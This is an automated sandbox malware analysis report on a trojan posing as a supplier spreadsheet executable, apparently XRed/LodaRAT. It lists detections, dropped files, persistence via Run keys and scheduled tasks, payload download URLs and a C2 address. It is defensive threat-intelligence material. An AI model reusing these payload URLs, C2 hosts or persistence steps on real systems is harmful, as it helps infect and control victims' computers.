                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow3
                                Process Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation
                                Network Sniffing11
                                Application Window Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection
                                Input Capture1
                                System Owner/User Discovery
                                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582318 Sample: Supplier 0202AW-PER2 Sheet.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 53 freedns.afraid.org 2->53 55 xred.mooo.com 2->55 57 2 other IPs or domains 2->57 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 75 18 other signatures 2->75 9 Supplier 0202AW-PER2 Sheet.exe 1 6 2->9         started        12 DELPQB.exe 2->12         started        15 EXCEL.EXE 228 62 2->15         started        17 6 other processes 2->17 signatures3 73 Uses dynamic DNS services 53->73 process4 file5 45 C:\...\._cache_Supplier 0202AW-PER2 Sheet.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->47 dropped 49 C:\ProgramData\Synaptics\RCXC902.tmp, PE32 9->49 dropped 51 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->51 dropped 19 Synaptics.exe 63 9->19         started        24 ._cache_Supplier 0202AW-PER2 Sheet.exe 2 5 9->24         started        85 Multi AV Scanner detection for dropped file 12->85 87 Machine Learning detection for dropped file 12->87 89 Found API chain indicative of sandbox detection 12->89 26 splwow64.exe 15->26         started        signatures6 process7 dnsIp8 59 drive.usercontent.google.com 142.250.181.225, 443, 49710, 49711 GOOGLEUS United States 19->59 61 docs.google.com 216.58.206.46, 443, 49704, 49705 GOOGLEUS United States 19->61 63 freedns.afraid.org 69.42.215.252, 49708, 80 AWKNET-LLCUS United States 19->63 39 C:\Users\user\Documents\~$cache1, PE32 19->39 dropped 77 Antivirus detection for dropped file 19->77 79 Multi AV Scanner detection for dropped file 19->79 81 Drops PE files to the document folder of the user 19->81 83 Machine Learning detection for dropped file 19->83 28 WerFault.exe 19->28         started        65 172.111.138.100, 49728, 5552 VOXILITYGB United States 24->65 41 C:\Users\user\AppData\Roaming\...\DELPQB.exe, PE32 24->41 dropped 43 C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs, ASCII 24->43 dropped 30 cmd.exe 24->30         started        33 wscript.exe 24->33         started        file9 signatures10 process11 signatures12 91 Uses schtasks.exe or at.exe to add and modify task schedules 30->91 35 conhost.exe 30->35         started        37 schtasks.exe 30->37         started        93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 33->93 process13

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                Supplier 0202AW-PER2 Sheet.exe85%VirustotalBrowse
                                Supplier 0202AW-PER2 Sheet.exe100%AviraTR/Dldr.Agent.SH
                                Supplier 0202AW-PER2 Sheet.exe100%AviraW2000M/Dldr.Agent.17651006
                                Supplier 0202AW-PER2 Sheet.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs100%AviraVBS/Runner.VPJI
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCXC902.tmp100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\RCXC902.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windata\DELPQB.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCXC902.tmp100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCXC902.tmp100%ReversingLabsWin32.Worm.Zorex
                                C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Windata\DELPQB.exe55%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe55%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Documents\~$cache1100%ReversingLabsWin32.Worm.Zorex
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://xred.site50.net/syn/Synaptics.rar100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware
                                https://docs.goooZ0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SUpdate.ini01100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/Synaptics.rar4100%Avira URL Cloudmalware
                                https://docs.gooXZ0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/SUpdate.ini100%Avira URL Cloudmalware
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                69.42.215.252
                                truefalse
                                  high
                                  docs.google.com
                                  216.58.206.46
                                  truefalse
                                    high
                                    drive.usercontent.google.com
                                    142.250.181.225
                                    truefalse
                                      high
                                      xred.mooo.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl$Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1RCXC902.tmp.0.drfalse
                                                    high
                                                    https://docs.google.com/8Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.usercontent.google.com/7~Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://drive.usercontent.google.com/V~Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.usercontent.google.com/YSynaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://upx.sf.netAmcache.hve.25.drfalse
                                                                  high
                                                                  http://xred.site50.net/syn/Synaptics.rarRCXC902.tmp.0.drtrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://docs.goooZSynaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://ip-score.com/checkip/._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2488675062.00000000017EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://docs.google.com/%Synaptics.exe, 00000003.00000002.1703794957.000000000F10C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://xred.site50.net/syn/SUpdate.ini01Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://docs.google.com/Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F10C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://docs.gooXZSynaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://xred.site50.net/syn/SSLLibrary.dlSupplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCXC902.tmp.0.drfalse
                                                                              high
                                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1RCXC902.tmp.0.drfalse
                                                                                high
                                                                                https://docs.google.com/uc?id=0BxsMXSynaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://xred.site50.net/syn/Synaptics.rar4Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978DSupplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://xred.site50.net/syn/SUpdate.iniRCXC902.tmp.0.drtrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.1705901782.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1709014926.0000000012C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1713766865.00000000156BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1718925846.0000000017FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1679716664.0000000004C5E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://xred.site50.net/syn/SSLLibrary.dllRCXC902.tmp.0.drtrue
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          142.250.181.225
                                                                                          drive.usercontent.google.comUnited States
                                                                                          15169GOOGLEUSfalse
                                                                                          172.111.138.100
                                                                                          unknownUnited States
                                                                                          3223VOXILITYGBtrue
                                                                                          216.58.206.46
                                                                                          docs.google.comUnited States
                                                                                          15169GOOGLEUSfalse
                                                                                          69.42.215.252
                                                                                          freedns.afraid.orgUnited States
                                                                                          17048AWKNET-LLCUSfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1582318
                                                                                          Start date and time:2024-12-30 10:57:07 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 6s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:34
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Supplier 0202AW-PER2 Sheet.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.expl.evad.winEXE@23/49@8/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 66.7%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 89
                                                                                          • Number of non-executed functions: 281
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.189.173.16, 13.89.179.12, 13.107.246.45, 40.126.32.76, 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, onedscolprdwus17.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
                                                                                          • Execution Graph export aborted for target Synaptics.exe, PID 7412 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          TimeTypeDescription
                                                                                          04:58:07API Interceptor256x Sleep call for process: Synaptics.exe modified
                                                                                          06:00:54API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                          06:02:14API Interceptor17x Sleep call for process: splwow64.exe modified
                                                                                          10:58:01AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                          10:58:03Task SchedulerRun new task: ZMNYQK.exe path: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                          10:58:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ZMNYQK "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                          10:58:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnk
                                                                                          12:00:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZMNYQK "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.111.138.100Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                              RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                    bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                      gry.exeGet hashmaliciousUnknownBrowse
                                                                                                        dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                          nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse
                                                                                                            69.42.215.252zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            freedns.afraid.orgzhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            VOXILITYGBloligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 104.250.189.221
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 104.243.246.120
                                                                                                            nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 46.243.206.70
                                                                                                            7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 37.221.166.158
                                                                                                            fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 5.254.60.108
                                                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 37.221.160.225
                                                                                                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            AWKNET-LLCUSzhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            37f463bf4616ecd445d4a1937da06e19zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 142.250.181.225
                                                                                                            • 216.58.206.46
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\ProgramData\Synaptics\RCXC902.tmpPurchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                              RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):118
                                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.133154008930874
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:USQjVpsXImo0WMn4DzJDzqjLOA/StzxwzuiF1Z24IO8EKDzy:0yX5WMn4Jqj8KzuiF1Y4IO8zy
                                                                                                                MD5:042C37188BE90246119E3D2DB9EAC516
                                                                                                                SHA1:13D0BFEED67B48C8EC144B10408E5ADE09F02B20
                                                                                                                SHA-256:C126AEC827A4C0B89FEC06BE5CBA1C4B0F329E95F9CDA852C47676B51A10D1C9
                                                                                                                SHA-512:B2BE0D9DD7246AD57179FE124981FD093171DC3EB0EF3714D52C9484B316BECC31272E7D3F9B14144D3C9259448A73874E28720375FBBA65D27B0E157902A455
                                                                                                                Malicious:false
